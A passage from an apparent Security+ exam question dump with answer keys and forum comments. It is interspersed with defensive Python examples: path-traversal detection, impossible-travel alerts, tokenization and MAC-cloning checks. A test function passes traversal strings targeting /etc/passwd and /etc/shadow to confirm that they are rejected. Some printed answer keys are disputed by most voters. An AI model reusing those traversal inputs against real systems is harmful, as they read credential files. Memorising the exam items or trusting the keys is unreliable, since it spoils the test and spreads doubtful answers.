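    if os.path.commonpath([root_real, candidate]) != root_real:
        raise PermissionError(f"path escapes web root: {user_path!r}")
    return candidate


def find_traversal_attempts(log_text):
    """Return (client_ip, decoded_value, status) for every request whose path
    or a query value contains a '..' component after up to two rounds of
    URL decoding. Status 200 with a non-zero size is the case the exam
    question describes: the traversal succeeded."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, _method, target, status, _size = m.groups()
        parts = urlsplit(target)
        candidates = [unquote(parts.path)]
        # parse_qsl decodes once; unquote again to catch %252e double encoding.
        candidates += [unquote(v) for _, v in parse_qsl(parts.query, keep_blank_values=True)]
        for value in candidates:
            if DOTDOT_RE.search(value):
                hits.append((ip, value, int(status)))
                break
    return hits


def resolve_demo():
    """Exercise resolve_under_root against a throwaway web root; returns
    (allowed_path_is_inside_root, escapes_rejected_count)."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "css"))
        inside = resolve_under_root(root, "css/../index.html")
        rejected = 0
        for bad in ("../../etc/passwd", "%2e%2e/%2e%2e/etc/passwd", "/../../etc/shadow"):
            try:
                resolve_under_root(root, bad)
            except PermissionError:
                rejected += 1
        expected = os.path.join(os.path.realpath(root), "index.html")
        return inside == expected, rejected


if __name__ == "__main__":
    for ip, value, status in find_traversal_attempts(SAMPLE_LOG):
        print(f"{ip} traversal attempt -> {value} (HTTP {status})")
    print(resolve_demo())
```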

Question #265 Topic 1

A Chief Security Officer is looking for a solution that can reduce the occurrence of customers receiving errors from back-end infrastructure when
systems go offline unexpectedly. The security architect would like the solution to help maintain session persistence. Which of the following would
BEST meet the requirements?

A. Reverse proxy

B. NIC teaming

C. Load balancer

D. Forward proxy

Correct Answer: A

Community vote distribution


C (80%) A (20%)

  Elly98 4 days, 1 hour ago


Why not NIC Teaming?
upvoted 1 times

  Elly98 4 days, 1 hour ago


Network interface card (NIC) teaming is a method of providing high availability and fault tolerance in servers. (Source: Dell)
upvoted 1 times

  amadeosmith 1 week ago


Selected Answer: A
Layer-4 load balancers process requests faster than Layer-7 ones, but they cannot provide session-persistent load balancing. On the other side,
layer-7 load balancers, which are known as reverse-proxies, can direct all requests of an application-level session to the same server, but they
impose a high processing cost due to processing requests at the application level.
upvoted 1 times

  afazaeli 1 month, 4 weeks ago


NIC Teaming is correct
upvoted 1 times

  Sir_Learnalot 2 months, 3 weeks ago


Selected Answer: C
Load balancer and Reverse Proxy will both do the job for requirement 1, but load balancer will also provide session persistency
upvoted 2 times

  Tomtom11 3 months ago


It's not C.
Load balancing is best for stateless systems, as subsequent requests can be handled by any server, not just the one that processed the previous request.
upvoted 1 times

  Sandon 1 week, 2 days ago


It is C
upvoted 2 times

  kennyleung0514 3 months, 1 week ago


Selected Answer: C
Load Balancer can provide below functions:
1. Not to send to the offlined systems with active monitoring.
2. Have persistence settings
upvoted 2 times

  atrax 3 months, 2 weeks ago


Selected Answer: A
Same question as #3
upvoted 1 times

  yasuke 2 months, 3 weeks ago


Q#3 states that session persistence is not important hence reverse proxy.
for this Q session persistence is important hence LB.
upvoted 1 times

  atrax 3 months, 2 weeks ago


My bad, it's Load Balancer, C.
upvoted 1 times

  NXPERT 3 months, 2 weeks ago


Selected Answer: C
Agree, load balancer maintains "session persistence"
upvoted 1 times

  jspecht 3 months, 2 weeks ago


Selected Answer: C
A load balancer can monitor the backend servers and direct traffic to working servers when other servers go offline. It can also maintain session
persistence, where a reverse proxy does not care about session persistence.
upvoted 4 times

  Callie_Cassanova 3 months, 2 weeks ago


If you put load balancing wouldn't the answer be NIC teaming since it includes load balancing?
upvoted 2 times

  03allen 3 months, 1 week ago


Yes,
Network Interface Card (NIC) teaming is a common technique of grouping physical network adapters to improve performance and
redundancy. The major benefits of NIC teaming are load balancing (redistributing traffic over networks) and failover (ensuring network
continuity in the event of system hardware failure) without the need for multiple physical connections.

Can anyone answer this, please?
upvoted 1 times

  RuthS 3 months, 1 week ago


The answer should be B. The key here is "session persistence". Load balancing would direct to the server, but if the NIC was down, the
session would end.
By doing NIC teaming, if a NIC goes down, there is redundancy to keep the session persistence.
upvoted 2 times

Question #266 Topic 1

Which of the following should an organization consider implementing in the event executives need to speak to the media after a publicized data
breach?

A. Incident response plan

B. Business continuity plan

C. Communication plan

D. Disaster recovery plan

Correct Answer: C

Community vote distribution


C (100%)

  Gino_Slim Highly Voted  3 months, 1 week ago


Selected Answer: C
Answer is C.
A communication plan is a policy-driven approach to providing company stakeholders with certain information.

I got this through process of elimination.

I take my test this Saturday 10/29/22.

This is the last question in review for me.
See y'all on the other side.
upvoted 13 times

  Sandon 2 months, 3 weeks ago


I'm sure you crushed it. Thanks for your helpful comments.
upvoted 1 times

  Freddy_0034 2 months, 3 weeks ago


Will miss you and stoneface.
upvoted 4 times

  Ron9481 Most Recent  3 months ago


Passed today with 794. I saw all the PBQs and a lot of the questions verbatim. And I'm not a bot. I'm saying that because I didn't believe all the
positive reviews. I saw a couple of reviews that said that they had none of the questions from this dump, but that wasn't the case for me. I
reviewed all the questions at least 4 times.
upvoted 4 times

  banditring 3 months, 3 weeks ago


Where is Communication Plan in the objectives?
upvoted 4 times

  Skelter117 3 months, 3 weeks ago


Section 4.2 look on the right side
upvoted 6 times

Question #267 Topic 1

A well-known organization has been experiencing attacks from APTs. The organization is concerned that custom malware is being created and
emailed into the company or installed on USB sticks that are dropped in parking lots. Which of the following is the BEST defense against this
scenario?

A. Configuring signature-based antivirus to update every 30 minutes

B. Enforcing S/MIME for email and automatically encrypting USB drives upon insertion

C. Implementing application execution in a sandbox for unknown software

D. Fuzzing new files for vulnerabilities if they are not digitally signed

Correct Answer: C

Community vote distribution


C (77%) B (23%)

  no_name_ Highly Voted  2 months, 2 weeks ago


Selected Answer: C
Encryption is the method by which information is converted into secret code that hides the information's true meaning. This does nothing for
protecting a system. Encrypting bad code will just look different and mess up your system anyway.
upvoted 6 times

  ronniehaang Most Recent  3 days, 22 hours ago


Selected Answer: B
B. Enforcing S/MIME for email and automatically encrypting USB drives upon insertion

In the described scenario, the best defense is to enforce S/MIME for email and automatically encrypt USB drives upon insertion. S/MIME
(Secure/Multipurpose Internet Mail Extensions) is a standard for public key encryption and digital signatures for email. This helps to ensure that
the email is encrypted end-to-end, making it more difficult for attackers to intercept and read sensitive information.

Automatically encrypting USB drives upon insertion helps to ensure that the data on the drive is protected in case it is lost or stolen. This way,
even if the attacker is able to copy the malware to the drive, it will be encrypted and unreadable, reducing the risk of a successful attack.
upvoted 1 times

  ArthurCockburn 3 days, 17 hours ago


You're reading the question entirely wrong. The issue isn't that emails/USB sticks with sensitive data are not encrypted and being read by
attackers.

The question states that the delivery system for custom malware is email and USB sticks being left in parking lots (and implies that the users
are plugging them into the target networks, compromising them). Encrypting data doesn't change that the malware has already reached the
target network.

Implementing application execution of unknown software in a sandbox would completely remove the possibility that users unknowingly run a
malicious application they received through an email or found on a USB stick.
upvoted 2 times

  Nirmalabhi 2 weeks, 2 days ago


I just don't understand how it can be C, sandboxing. It has nothing to do with USB?
upvoted 1 times

  Ranaer 3 days, 3 hours ago


/The organization is concerned that custom malware is being created and emailed into the company or installed on USB sticks that are
dropped in parking lots. /

There is custom malware on the USB sticks. And you can try to train people as much as you want, they will always be stupid and/or make
mistakes and plug that USB into one of your machines. Your compensating control is that you force any application into a sandbox so they
can't harm your network.
upvoted 1 times

  Sandon 1 week, 2 days ago


It does
upvoted 1 times

  FMMIR 1 month, 3 weeks ago


Selected Answer: C
The best defense against the scenario described is implementing application execution in a sandbox for unknown software. A sandbox is a
controlled environment in which an application can be executed and observed without affecting the rest of the system. This allows the
application to be run safely, even if it is unknown or potentially malicious. If the application is found to be malicious, it can be terminated without
damaging the rest of the system. Configuring signature-based antivirus to update every 30 minutes can help protect against known malware, but
it will not protect against custom malware that has not yet been detected. Enforcing S/MIME for email and automatically encrypting USB drives
upon insertion can help protect against unauthorized access to sensitive data, but it will not protect against malware that is installed on a system.
Fuzzing new files for vulnerabilities can help identify potential weaknesses in software, but it will not protect against malware that is already
installed on a system
upvoted 4 times

  viksap 1 month, 2 weeks ago


Are you scheduled to take your exam soon or have you taken it?
upvoted 1 times

  okay123 1 month, 3 weeks ago


Selected Answer: B
It's B because why would we encrypt malware? The goal of encryption is to protect data by preventing it from being accessed by unauthorized
users.

Sandboxing is used to isolate software suspected to be malicious. So it's B
upvoted 1 times

  Sandon 1 week, 2 days ago


Encrypting malware does not stop it
upvoted 1 times

  BluEric 2 months, 3 weeks ago


Selected Answer: C
Going with C . Encrypting malware will not protect the system, it'll just protect the malware itself. A sandbox environment will ensure malware
does not get into the real system.
upvoted 4 times

  carpathia 2 months, 3 weeks ago


Selected Answer: C
Unless I haven't heard of this method, how do S/MIME and encrypting USB sticks protect against malware? If it's custom malware, antivirus won't
help. Most probably C, sandbox, but then I am not sure how a sandbox works: is this software that can be installed on every machine and
triggers the sandbox automatically, or is it a separate isolated system? Someone with knowledge would be of great help. If it's a separate
system it doesn't make any sense in this question as an answer.
upvoted 3 times

  nobnarb 2 months, 3 weeks ago


Selected Answer: C
On what planet does encrypting an enemy flash drive do anything for your company's security?
upvoted 4 times

  03allen 2 months, 3 weeks ago


Selected Answer: B
This is a new question
upvoted 2 times

  Imanism 2 months, 3 weeks ago


Selected Answer: C
Because it mentions custom malware, the only way to secure it is a sandbox
upvoted 3 times

  comeragh 2 months, 3 weeks ago


Selected Answer: B
B seems to make most sense here given the question
upvoted 1 times

  ankit_1606 2 months, 3 weeks ago


Answer is B. The question itself has the answer. USB=USB and Email=S/MIME
upvoted 1 times

  kausalya2022 2 months, 3 weeks ago


Will encrypting malware will protect against it?
upvoted 1 times

  kstevens11 2 months, 3 weeks ago


Selected Answer: B
I would think B is a better defense, as it mentions two more preventive measures. C doesn't account for all options (something other than an
application). I also would go with user training if it were given as an option here.
upvoted 2 times

Question #268 Topic 1

A company is implementing BYOD and wants to ensure all users have access to the same cloud-based services. Which of the following would
BEST allow the company to meet this requirement?

A. IaaS

B. PaaS

C. MaaS

D. SaaS

Correct Answer: B

Community vote distribution


D (100%)

  BluEric 2 months, 3 weeks ago


Selected Answer: D
Going with D- SaaS. It is not stating what type of devices, just BYOD, so cannot tell which platform is needed, or what requirements are involved.
SaaS is the one that fits the most, IMHO.
upvoted 2 times

  blacktaliban 2 months, 3 weeks ago


Selected Answer: D
going with D
upvoted 1 times

  bengy78 2 months, 3 weeks ago


It has to be SaaS. Phones don't need access to server and network hardware (IaaS) or an application development server (PaaS) or monitoring
(MaaS)
upvoted 2 times

  imageee 2 months, 3 weeks ago


Selected Answer: D
Must be D?
upvoted 3 times

  Sandon 2 months, 3 weeks ago


Agreed
upvoted 1 times

Question #269 Topic 1

During a recent security incident at a multinational corporation, a security analyst found the following logs for an account called user:

Which of the following account policies would BEST prevent attackers from logging in as user?

A. Impossible travel time

B. Geofencing

C. Time-based logins

D. Geolocation

Correct Answer: A

Community vote distribution


A (100%)

  rodwave 2 months, 3 weeks ago


Selected Answer: A
Answer: Impossible travel time

Impossible Travel is a calculation made by comparing a user's last known location to their current location, then assessing whether the trip is
likely or even possible in the time that elapsed between the two measurements.

It can calculate the time it would take to travel from New York to Los Angeles and see it would be impossible to accomplish this within a minute.
upvoted 4 times

  imageee 2 months, 3 weeks ago


Selected Answer: A
Answer A
upvoted 1 times

  03allen 2 months, 3 weeks ago


Selected Answer: A
Seems like the website is giving the right answers now.
upvoted 2 times
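The impossible-travel check rodwave describes, as an added example that is not part of the exam page: it parses constructed login events, computes the great-circle distance between consecutive successful logins by the same account, and alerts when the implied speed is beyond anything a flight could achieve (cities, coordinates, addresses and the 1000 km/h ceiling are assumptions for this example).

```python
"""Impossible-travel detection over constructed login events (added example,
not from the exam page). Two successful logins by the same account are
flagged when covering the distance between them in the elapsed time would
require a speed no flight can reach. Cities, coordinates, addresses and the
1000 km/h ceiling are assumptions for this example."""
import re
from datetime import datetime, timezone
from math import asin, cos, radians, sin, sqrt

EARTH_RADIUS_KM = 6371.0
MAX_PLAUSIBLE_KMH = 1000.0  # assumed ceiling, a little above airliner cruise speed

# Constructed authentication log; 203.0.113.0/24 and 198.51.100.0/24 are documentation ranges.
SAMPLE_LOG = """\
2023-01-20T09:00:00Z user=user result=success src=203.0.113.10 geo="New York" lat=40.7128 lon=-74.0060
2023-01-20T09:00:30Z user=user result=failure src=198.51.100.77 geo="Tokyo" lat=35.6762 lon=139.6503
2023-01-20T09:01:00Z user=user result=success src=198.51.100.23 geo="Los Angeles" lat=34.0522 lon=-118.2437
2023-01-21T09:00:00Z user=user result=success src=203.0.113.10 geo="New York" lat=40.7128 lon=-74.0060
2023-01-20T12:00:00Z user=alice result=success src=203.0.113.44 geo="Boston" lat=42.3601 lon=-71.0589
"""

LINE_RE = re.compile(
    r'^(\S+) user=(\S+) result=(\S+) src=\S+ geo="([^"]+)" lat=(\S+) lon=(\S+)$'
)


def parse_logins(log_text):
    """Return successful logins as dicts sorted by time. Failed attempts are
    ignored: they do not place the legitimate user anywhere."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, user, result, city, lat, lon = m.groups()
        if result != "success":
            continue
        when = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
        events.append({"user": user, "when": when, "city": city,
                       "lat": float(lat), "lon": float(lon)})
    return sorted(events, key=lambda e: e["when"])


def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance between two latitude/longitude points, in km."""
    phi1, phi2 = radians(lat1), radians(lat2)
    dphi = radians(lat2 - lat1)
    dlam = radians(lon2 - lon1)
    a = sin(dphi / 2) ** 2 + cos(phi1) * cos(phi2) * sin(dlam / 2) ** 2
    return 2 * EARTH_RADIUS_KM * asin(sqrt(a))


def impossible_travel(events, max_kmh=MAX_PLAUSIBLE_KMH):
    """Compare each login with the same user's previous one. Returns one alert
    per pair whose implied speed exceeds max_kmh. Zero elapsed time with a
    non-zero distance counts as infinite speed."""
    last_seen = {}
    alerts = []
    for ev in events:
        prev = last_seen.get(ev["user"])
        if prev is not None:
            km = haversine_km(prev["lat"], prev["lon"], ev["lat"], ev["lon"])
            hours = (ev["when"] - prev["when"]).total_seconds() / 3600.0
            if hours > 0:
                speed = km / hours
            else:
                speed = float("inf") if km > 0 else 0.0
            if speed > max_kmh:
                alerts.append({"user": ev["user"], "from": prev["city"], "to": ev["city"],
                               "km": round(km), "hours": round(hours, 3), "kmh": round(speed)})
        last_seen[ev["user"]] = ev
    return alerts


if __name__ == "__main__":
    for a in impossible_travel(parse_logins(SAMPLE_LOG)):
        print(f"{a['user']}: {a['from']} -> {a['to']} in {a['hours']} h "
              f"({a['km']} km, ~{a['kmh']} km/h) IMPOSSIBLE TRAVEL")
```

The New York to Los Angeles pair one minute apart is flagged; the return to New York 24 hours later is a plausible flight and is not.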

Question #270 Topic 1

An organization is tuning SIEM rules based on threat intelligence reports. Which of the following phases of the incident response process does
this scenario represent?

A. Lessons learned

B. Eradication

C. Recovery

D. Preparation

Correct Answer: D

Community vote distribution


D (100%)

  GetBuckets 1 month, 3 weeks ago


That’s D. Why? The organization learned about new threats/vulnerabilities from these threat intelligence reports that made them tune (tweak) their
SIEM rules.
upvoted 1 times

  nobnarb 2 months, 3 weeks ago


Selected Answer: D
They simply received intelligence reports. They are adjusting their defenses in PREPARATION for an attack. Now if this was after an attack then it
would fall into the correction category.
upvoted 1 times

  rodwave 2 months, 3 weeks ago


Selected Answer: D
Answer: Preparation

The preparation phase is when the organization is preparing for the attack. Tuning the SIEM is just providing the latest threat information to the
system for preparation.

=======================
Phases of the Incident Response Plan:
1. Preparation - Preparing for an attack and how to respond
2. Identification - Identifying the threat
3. Containment - Containing the threat
4. Eradication - Removing the threat
5. Recovery - Recovering affected systems
6. Lessons Learned - Evaluating the incident response, see where there can be improvements for a future incident.
upvoted 2 times

  kindis 2 months, 3 weeks ago


Lessons learned A for me.
upvoted 1 times

  comeragh 2 months, 3 weeks ago


Selected Answer: D
Agree with D here
upvoted 3 times

Question #271 Topic 1

The database administration team is requesting guidance for a secure solution that will ensure confidentiality of cardholder data at rest only in
certain fields in the database schema. The requirement is to substitute a sensitive data field with a non-sensitive field that is rendered useless if a
data breach occurs. Which of the following is the BEST solution to meet the requirement?

A. Tokenization

B. Masking

C. Full disk encryption

D. Mirroring

Correct Answer: A

Community vote distribution


A (100%)

  Imanism Highly Voted  2 months, 3 weeks ago


Selected Answer: A
Tokenization is mainly used to protect data at rest whereas masking is used to protect data in use.
upvoted 7 times

  JSOG Most Recent  2 months ago


Selected Answer: A
A for me
upvoted 1 times

  carpathia 2 months, 3 weeks ago


Selected Answer: A
"While both tokenization and masking are great techniques used to protect sensitive data, tokenization is mainly used to protect data at rest
whereas masking is used to protect data in use."

http://www.differencebetween.net/technology/difference-between-tokenization-and-masking/#ixzz7kbfKgsdk
upvoted 3 times

  comeragh 2 months, 3 weeks ago


Selected Answer: A
Agree with A being correct answer here
upvoted 1 times
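The distinction the answers draw between tokenization (data at rest) and masking (data in use), as an added example that is not part of the exam page: the application table stores only a random token, the vault alone can map it back, and a simulated dump of the table exposes no card number; masking merely hides digits for display (the TokenVault, order rows and card number are constructed for illustration).

```python
"""Tokenization versus masking for a cardholder-data column (added example,
not from the exam page). Tokenization swaps the stored PAN for a random
surrogate that only a separate vault can map back, so a dump of the orders
table is useless to an attacker; masking only hides digits for display and
is the data-in-use control. The TokenVault, order table and card numbers
here are constructed for illustration."""
import secrets


def luhn_ok(pan):
    """Luhn check so obviously malformed PANs are rejected before tokenizing."""
    digits = [int(c) for c in pan if c.isdigit()]
    if len(digits) != len(pan) or not 13 <= len(digits) <= 19:
        return False
    total = 0
    for i, d in enumerate(reversed(digits)):
        if i % 2 == 1:          # double every second digit from the right
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


class TokenVault:
    """Toy in-memory vault. In a real deployment this is a separately
    hardened service; the application database never sees the PAN."""

    def __init__(self):
        self._token_to_pan = {}
        self._pan_to_token = {}

    def tokenize(self, pan):
        pan = pan.replace(" ", "")
        if not luhn_ok(pan):
            raise ValueError("not a valid card number")
        if pan in self._pan_to_token:      # same PAN -> same token, so joins still work
            return self._pan_to_token[pan]
        while True:
            token = "tok_" + secrets.token_hex(12)   # random, not derived from the PAN
            if token not in self._token_to_pan:
                break
        self._token_to_pan[token] = pan
        self._pan_to_token[pan] = token
        return token

    def detokenize(self, token):
        """Only the vault (e.g. the payment service) may call this."""
        return self._token_to_pan[token]


def mask_pan(pan, keep_last=4):
    """Masking for display: the sensitive digits are replaced with '*'.
    The real PAN still exists somewhere, which is why this is a data-in-use
    control rather than a substitute for tokenization at rest."""
    pan = pan.replace(" ", "")
    return "*" * (len(pan) - keep_last) + pan[-keep_last:]


def store_order(vault, orders, customer, pan, amount):
    """Write an order row that carries only the token, never the PAN."""
    row = {"customer": customer, "card_token": vault.tokenize(pan), "amount": amount}
    orders.append(row)
    return row


def leaked_table_reveals_pan(orders, pan):
    """Simulate a breach of the orders table: does any row expose the PAN?"""
    digits = pan.replace(" ", "")
    return any(digits in str(v) for row in orders for v in row.values())


if __name__ == "__main__":
    vault, orders = TokenVault(), []
    row = store_order(vault, orders, "cust-1", "4111 1111 1111 1111", 42.0)
    print("stored row:", row)
    print("display:", mask_pan("4111 1111 1111 1111"))
    print("breach of orders table reveals PAN:", leaked_table_reveals_pan(orders, "4111111111111111"))
    print("vault can still detokenize:", vault.detokenize(row["card_token"]))
```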

Question #272 Topic 1

A company’s security team received notice of a critical vulnerability affecting a high-profile device within the web infrastructure. The vendor patch
was just made available online but has not yet been regression tested in development environments. In the interim, firewall rules were
implemented to reduce the access to the interface affected by the vulnerability. Which of the following controls does this scenario describe?

A. Deterrent

B. Compensating

C. Detective

D. Preventive

Correct Answer: B

Community vote distribution


B (100%)

  Imanism Highly Voted  2 months, 3 weeks ago


Selected Answer: B
Compensating control, also called an alternative control
upvoted 7 times

  comeragh Most Recent  2 months, 3 weeks ago


Selected Answer: B
Compensating control looks to be correct here. Open to correction, however.
A compensating control, also called an alternative control, is a mechanism that is put in place to satisfy the requirement for a security measure
that is deemed too difficult or impractical to implement at the present time.
upvoted 3 times

Question #273 Topic 1

A security analyst is reviewing the following command-line output:

Which of the following is the analyst observing?

A. ICMP spoofing

B. URL redirection

C. MAC address cloning

D. DNS poisoning

Correct Answer: C

Community vote distribution: C (100%)

Freddy_0034 2 months, 3 weeks ago
C. MAC address Cloning
upvoted 1 times

Imanism 2 months, 3 weeks ago
Selected Answer: C
C for obvious reason
upvoted 3 times

comeragh 2 months, 3 weeks ago
Selected Answer: C
Agree with C here - MAC address cloning
upvoted 1 times
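The question's command-line output is not reproduced on this page, so here is what the pattern looks like in practice, as an added example that is not part of the original question or of any tool: a constructed `arp -a` listing in which one hardware address is bound to two IP addresses (the signature of a cloned MAC), plus a check for the neighbouring pattern of an IP whose MAC changed between two snapshots (ARP poisoning). All host names and addresses are made up.

```python
"""Spot MAC address cloning in ARP-table output.

Added example, not code from the ExamTopics page.  The `arp -a` text below is
constructed for illustration; none of the addresses belong to a real network.
"""
import re
from collections import defaultdict

# Constructed sample of Linux `arp -a` output.  192.168.1.77 shows the same
# hardware address as the gateway at 192.168.1.1: a cloned MAC.
ARP_OUTPUT = """\
gateway (192.168.1.1) at 00:11:22:33:44:55 [ether] on eth0
fileserver (192.168.1.20) at 08:00:27:aa:bb:cc [ether] on eth0
? (192.168.1.77) at 00:11:22:33:44:55 [ether] on eth0
printer (192.168.1.30) at 3c:2a:f4:12:34:56 [ether] on eth0
"""

ARP_LINE = re.compile(
    r"\((?P<ip>\d{1,3}(?:\.\d{1,3}){3})\)\s+at\s+"
    r"(?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})",
    re.IGNORECASE,
)


def parse_arp(text):
    """Return (ip, mac) pairs from `arp -a` style lines; MACs lower-cased."""
    pairs = []
    for line in text.splitlines():
        m = ARP_LINE.search(line)
        if m:
            pairs.append((m.group("ip"), m.group("mac").lower()))
    return pairs


def find_cloned_macs(pairs):
    """Map every MAC bound to more than one IP to the sorted list of those IPs.

    One hardware address answering for several IP addresses on the same
    segment is the footprint of MAC cloning: a second host using a
    legitimate NIC's address, for example to get past MAC-based filtering.
    """
    by_mac = defaultdict(set)
    for ip, mac in pairs:
        by_mac[mac].add(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}


def find_changed_macs(before, after):
    """Map IPs whose MAC differs between two snapshots to (old_mac, new_mac).

    The same IP suddenly resolving to a different MAC is the other pattern
    an analyst meets, and it points at ARP poisoning rather than cloning.
    """
    old = dict(before)
    return {ip: (old[ip], mac) for ip, mac in after if ip in old and old[ip] != mac}


if __name__ == "__main__":
    pairs = parse_arp(ARP_OUTPUT)
    for mac, ips in find_cloned_macs(pairs).items():
        print(f"MAC {mac} claimed by {len(ips)} hosts: {', '.join(ips)}")
```

Fed two snapshots of a real table, the two functions separate the answers the question offers: a duplicated MAC points to cloning, a MAC that changed for the same IP points to poisoning. The regular expression targets the `arp -a` layout; `ip neigh` prints `lladdr` instead of `at` and no parentheses, so it would need adapting for that output.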

Question #274 Topic 1

A company was recently breached. Part of the company’s new cybersecurity strategy is to centralize the logs from all security devices. Which of
the following components forwards the logs to a central source?

A. Log enrichment

B. Log aggregation

C. Log parser

D. Log collector

Correct Answer: D

Community vote distribution: D (86%) 14%

Knowledge33 [Highly Voted] 2 months, 3 weeks ago
Selected Answer: D
Log collectors are pieces of software that function to gather data from multiple independent sources and feed it into a unified source such as a
SIEM.

Log aggregation is the process of combining logs together. This is done to allow different formats from different systems to work together.
upvoted 6 times

mike47 [Most Recent] 3 days, 23 hours ago
Selected Answer: D
Log Collector is the answer as it collects data from "many different Sources" and brings all of it to one single place.
upvoted 1 times

carpathia 2 months, 1 week ago
Selected Answer: D
pg 123 Conklin's book, Log Collectors.
upvoted 1 times

nobnarb 2 months, 3 weeks ago
Selected Answer: B
Log aggregation is the mechanism for capturing, normalizing, and consolidating logs from different sources to a centralized platform for
correlating and analyzing the data.
upvoted 2 times

rodwave 2 months, 3 weeks ago
Selected Answer: D
Answer: Log collector

Log collectors are pieces of software that function by gathering data from multiple independent sources and feed it into a unified source such as
a SIEM. Log collectors will collect the logs and then the SIEM solution will store the logs.
upvoted 4 times

Question #275 Topic 1

Which of the following is the MOST likely reason for securing an air-gapped laboratory HVAC system?

A. To avoid data leakage

B. To protect surveillance logs

C. To ensure availability

D. To facilitate third-party access

Correct Answer: A

Community vote distribution: C (50%) A (50%)

Sir_Learnalot [Highly Voted] 2 months, 3 weeks ago
Selected Answer: C
Must be C for me. An HVAC system is an important and critical component of a data center. If this fails, the systems could overheat and therefore
crash, which ends in loss of availability and in the worst case also data loss.
upvoted 10 times

ronniehaang [Most Recent] 3 days, 22 hours ago
Selected Answer: A
A. To avoid data leakage. An air-gapped laboratory HVAC system is often used in environments where sensitive information is being handled,
such as research and development or government facilities. Securing the HVAC system helps prevent data leakage by physically separating the
system from any external networks and limiting the number of people who have access to the system. This helps reduce the risk of unauthorized
access and data breaches that could result from network infiltration or cyber attacks.
upvoted 2 times

T4IT 1 week, 1 day ago
Selected Answer: C
No AC no PC. C is the right answer.
upvoted 1 times

Sanjucbsa 1 month ago
Selected Answer: A
The option C for availability cannot be the answer as the air gap network is never connected to the outside network and so its availability is not
necessary.
upvoted 2 times

Ranaer 1 month, 1 week ago
Selected Answer: A
To everyone saying C, I believe you are wrong. Air gap concerns only network/data connection. Power isn't part of the air gap. Both the servers
and HVAC use the same power, even when the HVAC is air gapped.
A is clearly the only reasonable answer.
upvoted 3 times

[Removed] 1 month, 3 weeks ago
Selected Answer: A
Answer is A
upvoted 1 times

FMMIR 1 month, 3 weeks ago
Selected Answer: A
The most likely reason for securing an air-gapped laboratory HVAC system is to avoid data leakage. An air-gapped system is one that is
physically isolated from other networks, which makes it more difficult for an attacker to access data on the system. By securing the HVAC
system, you can help prevent data leakage by ensuring that the air within the laboratory is not contaminated with malicious particles that could
be used to infiltrate the system.
upvoted 3 times

robbrown2 1 week, 1 day ago
This is my vote for best answer yet!! COVID got everyone thinking malicious particles. You can just wear your mask in the datacenter!! LOL!
upvoted 1 times

Sandon 1 month, 2 weeks ago
Are you serious? Malicious particles?? lol
upvoted 6 times

nicekoda 2 months ago
HVACKer attacks are only useful for relaying commands into an air-gapped network, but not for stealing data.
upvoted 1 times

Blueteam 2 months, 1 week ago
Another bad question. However, I think A is the right answer.
The HVAC network can be used for bringing the HVAC system down.
However, an HVAC-connected network can also be used for accessing data. A good example is the theft of CC information from Target back in 2014.
https://krebsonsecurity.com/2014/02/target-hackers-broke-in-via-hvac-company/

I think the answer here depends on "laboratory"! What kind of laboratory is this?
Usually the data, and not operation, is the important function of labs.
In the above example the Target attackers did not hack the HVAC system to bring it down; they used it to access CC information.
upvoted 2 times

minimoose 2 months, 1 week ago
The HVAC system is air-gapped so there is no threat of leaking data. I think the answer is still C.
upvoted 2 times

Reese20_14 2 months, 2 weeks ago
Selected Answer: C
Almost picked A on this one but was saved by an Article from Bleepingcomputer.com regarding HVACKer attacks:

"HVACKer attacks are only useful for relaying commands into an air-gapped network, but not for stealing data. While malware can control a
computer’s heat emissions, *HVAC units are not equipped with enough accurate temperature sensors to pick up data* from a computer’s almost
indiscernible heat emissions."

So we most likely wouldn't be concerned with Data Leakage via an HVAC system.
upvoted 1 times

ych243666 2 months, 2 weeks ago
I think the air-gapped here means https://en.wikipedia.org/wiki/Air_gap_(networking), so the answer is A.
upvoted 3 times

kindis 2 months, 2 weeks ago
An air gap, air wall, air gapping or disconnected network is a network security measure employed on one or more computers to ensure that a
secure computer network is physically isolated from unsecured networks, such as the public Internet or an unsecured local area
It's A for me
upvoted 3 times

BluEric 2 months, 3 weeks ago
Selected Answer: A
I like A for this one, but I am not sure. The reason I am picking this, is that the keyword here is secure, and to me that ties directly to avoiding a
leakage/security issue
upvoted 1 times

nobnarb 2 months, 3 weeks ago
Selected Answer: C
Sure I guess C, but also if HVAC isn't secured they can use it to traverse through the network. But it does say MOST likely.
upvoted 1 times

Imanism 2 months, 3 weeks ago
Selected Answer: A
Just a little research. Not completely sure but I go with A
upvoted 1 times

Question #276 Topic 1

A user forwarded a suspicious email to the security team. Upon investigation, a malicious URL was discovered. Which of the following should be
done FIRST to prevent other users from accessing the malicious URL?

A. Configure the web content filter for the web address.

B. Report the website to threat intelligence partners.

C. Set the SIEM to alert for any activity to the web address.

D. Send out a corporate communication to warn all users of the malicious email.

Correct Answer: A

Community vote distribution: A (100%)

nobnarb 2 months, 3 weeks ago
Selected Answer: A
Definitely what you should do first.
upvoted 1 times

rodwave 2 months, 3 weeks ago
Selected Answer: A
Answer: Configure the web content filter for the web address.

Web content filtering is the practice of blocking access to web content that may be deemed offensive, inappropriate, or even dangerous. Better
to just block out the URL since we already know it's malicious now and notify later, since you don't know how many other people received the
email.
upvoted 1 times

Sir_Learnalot 2 months, 3 weeks ago
Selected Answer: A
"A" would be a preventive option. After that I'd go with "D", then "C", and last would be "B", but for the question... "A"
upvoted 1 times

kstevens11 2 months, 3 weeks ago
Selected Answer: A
only option that is preventative
upvoted 3 times

03allen 2 months, 3 weeks ago
I think D is also a common way to prevent a spread?
upvoted 1 times

Question #277 Topic 1

A systems analyst is responsible for generating a new digital forensics chain-of-custody form. Which of the following should the analyst include in
this documentation? (Choose two.)

A. The order of volatility

B. A CRC32 checksum

C. The provenance of the artifacts

D. The vendor’s name

E. The date and time

F. A warning banner

Correct Answer: CE

Community vote distribution: CE (76%) 12% 12%

ronniehaang 3 days, 22 hours ago
Selected Answer: CE
A systems analyst should include the following information in the new digital forensics chain-of-custody form:

E. The date and time
